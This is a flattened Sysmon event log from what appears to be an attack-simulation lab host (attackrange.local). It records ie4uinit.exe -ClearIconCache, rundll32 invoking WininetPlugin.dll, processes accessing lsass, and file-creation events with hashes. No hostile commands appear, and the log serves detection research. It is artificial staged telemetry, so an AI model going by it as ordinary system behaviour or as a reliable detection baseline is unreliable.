12:02:19.827{266CAFBE-64CA-6064-AC00-00000000AE01}4212ATTACKRANGE\AdministratorC:\Windows\System32\ie4uinit.exeC:\Users\ADMINI~1\AppData\Local\Temp\RGI98C1.tmpMD5=D41D8CD98F00B204E9800998ECF8427E,SHA256=E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000005763Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:19.827{266CAFBE-64CA-6064-AC00-00000000AE01}4212ATTACKRANGE\AdministratorC:\Windows\System32\ie4uinit.exeC:\Users\ADMINI~1\AppData\Local\Temp\RGI9824.tmpMD5=DD4F5026AA316D4AEC4A9D789E63E67B,SHA256=8D7E6CEE70D6035C066B93143461D5F636E144373F5C46BC10A8935D306E0737,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000005762Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:19.672{266CAFBE-64CA-6064-AC00-00000000AE01}4212ATTACKRANGE\AdministratorC:\Windows\System32\ie4uinit.exeC:\Users\ADMINI~1\AppData\Local\Temp\RGI9824.tmpMD5=D41D8CD98F00B204E9800998ECF8427E,SHA256=E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000005761Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:19.640{266CAFBE-648B-6064-7A00-00000000AE01}4692NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6C43C2C65CFBBF6E5365FE6BF3931672,SHA256=BB5C5C530297D1C66FAF194C933B82C9DCBB521F5DBC8C6D67426B053CE78ECF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000005760Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:19.609{266CAFBE-648B-6064-7A00-00000000AE01}4692NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B1707E8466BA4D6D9DC4A28DECA5B22A,SHA256=3A9C929E2BE2084F8AEFECFD996D8261678EA331D49791983BA1109BD12AC890,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000005759Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:19.236{266CAFBE-646A-6064-0B00-00000000AE01}856888C:\Windows\system32\lsass.exe{266CAFBE-64CB-6064-AF00-00000000AE01}2620C:\Windows\system32\RunDll32.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+24c07|C:\Windows\system32\lsasrv.dll+25d4d|C:\Windows\system32\lsasrv.dll+24a85|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005758Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:19.236{266CAFBE-646A-6064-0B00-00000000AE01}856888C:\Windows\system32\lsass.exe{266CAFBE-64CB-6064-AF00-00000000AE01}2620C:\Windows\system32\RunDll32.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+249cd|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005757Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:19.236{266CAFBE-646A-6064-0B00-00000000AE01}856888C:\Windows\system32\lsass.exe{266CAFBE-64CB-6064-AE00-00000000AE01}3556C:\Windows\system32\RunDll32.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+24c07|C:\Windows\system32\lsasrv.dll+25d4d|C:\Windows\system32\lsasrv.dll+24a85|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005756Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:19.236{266CAFBE-646A-6064-0B00-00000000AE01}856888C:\Windows\system32\lsass.exe{266CAFBE-64CB-6064-AE00-00000000AE01}3556C:\Windows\system32\RunDll32.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+249cd|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005755Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:19.220{266CAFBE-646C-6064-1000-00000000AE01}11242252C:\Windows\system32\svchost.exe{266CAFBE-64CB-6064-AF00-00000000AE01}2620C:\Windows\system32\RunDll32.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005754Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:19.220{266CAFBE-646C-6064-1000-00000000AE01}11241624C:\Windows\system32\svchost.exe{266CAFBE-64CB-6064-AF00-00000000AE01}2620C:\Windows\system32\RunDll32.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6084|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005753Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:19.220{266CAFBE-646C-6064-1000-00000000AE01}11242252C:\Windows\system32\svchost.exe{266CAFBE-64CB-6064-AE00-00000000AE01}3556C:\Windows\system32\RunDll32.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005752Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:19.220{266CAFBE-646C-6064-1000-00000000AE01}11241624C:\Windows\system32\svchost.exe{266CAFBE-64CB-6064-AE00-00000000AE01}3556C:\Windows\system32\RunDll32.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6084|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005751Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:19.204{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005750Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:19.204{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005749Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:19.204{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005748Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:19.189{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005747Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:19.189{266CAFBE-64C1-6064-9100-00000000AE01}51084328C:\Windows\system32\csrss.exe{266CAFBE-64CB-6064-AF00-00000000AE01}2620C:\Windows\system32\RunDll32.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000005746Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:19.189{266CAFBE-64CA-6064-AD00-00000000AE01}45364280C:\Windows\System32\ie4uinit.exe{266CAFBE-64CB-6064-AF00-00000000AE01}2620C:\Windows\system32\RunDll32.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\ADVAPI32.dll+1845f|C:\Windows\system32\migration\WininetPlugin.dll+2b25|C:\Windows\system32\migration\WininetPlugin.dll+1e44|C:\Windows\system32\migration\WininetPlugin.dll+176c|C:\Windows\System32\ie4uinit.exe+2b3c|C:\Windows\System32\ie4uinit.exe+33b8|C:\Windows\System32\ie4uinit.exe+245e7|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000005745Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:19.202{266CAFBE-64CB-6064-AF00-00000000AE01}2620C:\Windows\System32\rundll32.exe10.0.14393.4169 (rs1_release.210107-1130)Windows host process (Rundll32)Microsoft® Windows® Operating SystemMicrosoft CorporationRUNDLL32.EXEC:\Windows\system32\RunDll32.exe C:\Windows\system32\migration\WininetPlugin.dll,MigrateCacheForUser /m /0C:\Windows\system32\ATTACKRANGE\Administrator{266CAFBE-64C3-6064-2804-0B0000000000}0xb04282MediumMD5=23DB802097F7B7E520E40068A7E68B14,SHA256=28DE7D3E8BF4B19E44063A4BFC2E7C30AE488CD9A1F63320ED374E14AAECA667,IMPHASH=7D1CE1BAFE48B63D9D19E8E0E5DF3E6C{266CAFBE-64CA-6064-AD00-00000000AE01}4536C:\Windows\System32\ie4uinit.exeC:\Windows\System32\ie4uinit.exe -ClearIconCache 
10341000x80000000000000005744Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:19.189{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005743Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:19.189{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005742Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:19.189{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005741Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:19.189{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005740Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:19.189{266CAFBE-64C1-6064-9100-00000000AE01}51083828C:\Windows\system32\csrss.exe{266CAFBE-64CB-6064-AE00-00000000AE01}3556C:\Windows\system32\RunDll32.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000005739Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:19.189{266CAFBE-64CA-6064-AD00-00000000AE01}45364280C:\Windows\System32\ie4uinit.exe{266CAFBE-64CB-6064-AE00-00000000AE01}3556C:\Windows\system32\RunDll32.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\ADVAPI32.dll+1845f|C:\Windows\system32\migration\WininetPlugin.dll+2b25|C:\Windows\system32\migration\WininetPlugin.dll+1e44|C:\Windows\system32\migration\WininetPlugin.dll+1743|C:\Windows\System32\ie4uinit.exe+2b3c|C:\Windows\System32\ie4uinit.exe+33b8|C:\Windows\System32\ie4uinit.exe+245e7|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000005738Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:19.200{266CAFBE-64CB-6064-AE00-00000000AE01}3556C:\Windows\System32\rundll32.exe10.0.14393.4169 (rs1_release.210107-1130)Windows host process (Rundll32)Microsoft® Windows® Operating SystemMicrosoft CorporationRUNDLL32.EXEC:\Windows\system32\RunDll32.exe C:\Windows\system32\migration\WininetPlugin.dll,MigrateCacheForUser /m /0C:\Windows\system32\ATTACKRANGE\Administrator{266CAFBE-64C3-6064-2804-0B0000000000}0xb04282LowMD5=23DB802097F7B7E520E40068A7E68B14,SHA256=28DE7D3E8BF4B19E44063A4BFC2E7C30AE488CD9A1F63320ED374E14AAECA667,IMPHASH=7D1CE1BAFE48B63D9D19E8E0E5DF3E6C{266CAFBE-64CA-6064-AD00-00000000AE01}4536C:\Windows\System32\ie4uinit.exeC:\Windows\System32\ie4uinit.exe -ClearIconCache 
11241100x80000000000000005737Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:19.189{266CAFBE-64C4-6064-9E00-00000000AE01}3120C:\Windows\system32\taskhostw.exeC:\Users\Administrator\AppData\Local\Microsoft\Windows\INetCache\IE\container.dat2021-03-31 12:02:19.189 11241100x80000000000000005736Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:19.064{266CAFBE-64CA-6064-AD00-00000000AE01}4536C:\Windows\System32\ie4uinit.exeC:\Users\Administrator\AppData\Local\Microsoft\Windows\INetCache\counters.dat2021-03-31 12:02:19.049 10341000x80000000000000005735Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:19.033{266CAFBE-646A-6064-0B00-00000000AE01}856888C:\Windows\system32\lsass.exe{266CAFBE-64CA-6064-AD00-00000000AE01}4536C:\Windows\System32\ie4uinit.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+24c07|C:\Windows\system32\lsasrv.dll+25d4d|C:\Windows\system32\lsasrv.dll+24a85|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005734Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:19.033{266CAFBE-646A-6064-0B00-00000000AE01}856888C:\Windows\system32\lsass.exe{266CAFBE-64CA-6064-AD00-00000000AE01}4536C:\Windows\System32\ie4uinit.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+249cd|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 11241100x80000000000000005779Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:20.777{266CAFBE-64CA-6064-AC00-00000000AE01}4212C:\Windows\System32\ie4uinit.exeC:\Users\Administrator\AppData\Local\Microsoft\Internet Explorer\brndlog.txt2021-03-31 10:51:18.799 23542300x80000000000000005778Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:20.777{266CAFBE-64CA-6064-AC00-00000000AE01}4212ATTACKRANGE\AdministratorC:\Windows\System32\ie4uinit.exeC:\Users\Administrator\AppData\Local\Microsoft\Internet Explorer\brndlog.txtMD5=9902BAEDC06FA4A8681E696EE6C73C06,SHA256=D0628FA63102EE74053BC6EFDD297AED794848F5DC300DAA7E391F4CF04E8511,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000005777Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:20.730{266CAFBE-64CA-6064-AC00-00000000AE01}4212ATTACKRANGE\AdministratorC:\Windows\System32\ie4uinit.exeC:\Users\Administrator\AppData\Local\Microsoft\Internet 
